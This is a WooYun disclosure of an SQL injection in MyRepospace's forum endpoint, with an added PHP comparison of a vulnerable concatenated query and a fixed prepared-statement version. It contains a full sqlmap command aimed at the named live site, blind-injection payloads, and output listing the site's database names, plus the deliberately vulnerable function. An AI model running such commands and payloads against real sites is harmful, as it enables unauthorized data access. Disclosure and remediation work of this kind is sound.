Vulnerability summary

Defect ID: wooyun-2015-090059

Title: MyRepospace (third-party Cydia repository) SQL injection at one endpoint, allowing sensitive data in the database to be read

Vendor: MyRepospace

Author: 路人甲

Submitted: 2015-01-05 14:37

Fix deadline: 2015-02-19 14:38

Published: 2015-02-19 14:38

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: vendor could not be reached, or vendor actively ignored the report

Source: http://www.wooyun.org; for questions or assistance contact [email protected]

Tags:


Vulnerability details

Disclosure status:

2015-01-05: actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed
2015-02-19: the vendor has actively ignored the vulnerability; details disclosed to the public

Brief description:

MyRepospace has an SQL injection at one endpoint that allows sensitive data in the database to be read.

Detailed description:

URL: https://www.myrepospace.com/forums/index.php
Method: POST
Body: forumID=2&page=1
The forumID parameter is injectable (SQL injection).

Proof of vulnerability:

sqlmap>python sqlmap.py -u "https://www.myrepospace.com/forums/index.php" --data "forumID=2&page=1" -p forumID --dbms=mysql --threads 5 --dbs
sqlmap {1.0-dev-nongit-20141211} http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 14:18:18
[14:18:19] [INFO] testing connection to the target URL
[14:18:20] [INFO] heuristics detected web page charset 'utf-8'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: forumID (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: forumID=2' AND 5715=5715 AND 'wLkE'='wLkE&page=1
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: forumID=2' AND SLEEP(5) AND 'quFc'='quFc&page=1
---
[14:18:20] [INFO] testing MySQL
[14:18:22] [WARNING] reflective value(s) found and filtering out
[14:18:22] [INFO] confirming MySQL
[14:18:25] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.4.23, Apache
back-end DBMS: MySQL >= 5.0.0
[14:18:25] [INFO] fetching database names
[14:18:25] [INFO] fetching number of databases
[14:18:25] [INFO] retrieved:
[14:18:28] [INFO] heuristics detected web page charset 'ascii'
4
[14:18:33] [INFO] retrieving the length of query output
[14:18:33] [INFO] retrieved: 18
[14:19:43] [INFO] retrieved: information_schema
[14:19:43] [INFO] retrieving the length of query output
[14:19:43] [INFO] retrieved: 18
[14:20:55] [INFO] retrieved: myreposp_beta_repo
[14:20:55] [INFO] retrieving the length of query output
[14:20:55] [INFO] retrieved: 14
[14:21:54] [INFO] retrieved: myreposp_forum
[14:21:54] [INFO] retrieving the length of query output
[14:21:54] [INFO] retrieved: 13
[14:22:52] [INFO] retrieved: myreposp_main
available databases [4]:
[*] information_schema
[*] myreposp_beta_repo
[*] myreposp_forum
[*] myreposp_main

Fix recommendation:

Filter the input.

Copyright notice: please credit the source when reproducing: 路人甲@乌云

Vendor response

Vendor reply:

The vendor could not be reached, or the vendor actively refused the report.
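The report shows a POST forumID value being interpreted as SQL syntax (a quote closes the literal, and SLEEP() runs), which is what happens when the parameter is concatenated into the query string. The following PHP is an added illustration written for this page, not MyRepospace's source code, which is not shown; the table, column and DSN values are hypothetical. It places the vulnerable pattern next to the hardened one: validate forumID as a positive integer, then pass it to MySQL as a bound parameter so the value can never change the query's structure. It is written without PHP 7 syntax, matching the PHP 5.4 stack identified in the sqlmap output.

```php
<?php
// Added example (not the project's code). Schema, credentials and DSN are placeholders.

// --- Vulnerable pattern: user input concatenated into SQL (illustrative reconstruction) ---
function listThreadsVulnerable(mysqli $db, array $post)
{
    $forumID = $post['forumID'];                       // e.g. 2' AND SLEEP(5) AND 'a'='a
    $page    = isset($post['page']) ? (int) $post['page'] : 1;
    $offset  = ($page - 1) * 20;
    // A quote inside $forumID ends the string literal and the rest becomes SQL.
    $sql  = "SELECT id, title FROM threads WHERE forum_id = '$forumID' LIMIT $offset, 20";
    $rows = array();
    if ($result = $db->query($sql)) {
        while ($row = $result->fetch_assoc()) {
            $rows[] = $row;
        }
    }
    return $rows;
}

// --- Hardened version: type validation plus a server-side prepared statement ---
function connectDb()
{
    // Placeholder connection values; ERRMODE_EXCEPTION surfaces failures instead of
    // silently returning false, and disabling emulation makes MySQL itself prepare
    // the statement so parameters are sent separately from the SQL text.
    return new PDO(
        'mysql:host=localhost;dbname=forum;charset=utf8mb4',
        'db_user',
        'db_password',
        array(
            PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
            PDO::ATTR_EMULATE_PREPARES => false,
        )
    );
}

function listThreads(PDO $db, array $post)
{
    // forumID and page are identifiers/counters: accept only positive integers.
    $forumID = filter_var(
        isset($post['forumID']) ? $post['forumID'] : null,
        FILTER_VALIDATE_INT,
        array('options' => array('min_range' => 1))
    );
    $page = filter_var(
        isset($post['page']) ? $post['page'] : 1,
        FILTER_VALIDATE_INT,
        array('options' => array('min_range' => 1, 'max_range' => 10000))
    );
    if ($forumID === false || $page === false) {
        // Anything that is not a plain integer (quotes, SLEEP(), comments) is rejected here.
        http_response_code(400);
        return array();
    }
    $offset = ($page - 1) * 20;

    // Bound parameters: the values are data, never SQL syntax, whatever they contain.
    $stmt = $db->prepare(
        'SELECT id, title FROM threads WHERE forum_id = :forum LIMIT :offset, 20'
    );
    $stmt->bindValue(':forum',  $forumID, PDO::PARAM_INT);
    $stmt->bindValue(':offset', $offset,  PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Usage (hypothetical handler for the POST described in the report):
// $threads = listThreads(connectDb(), $_POST);
```

The integer check alone would already stop the payloads shown in the report, but it is the prepared statement that removes the class of bug: a later change that accepts a string parameter stays safe as long as it is bound rather than concatenated. The LIMIT offset is bound with PDO::PARAM_INT because MySQL rejects a quoted string in a LIMIT clause; with emulated prepares left on, PDO would quote it.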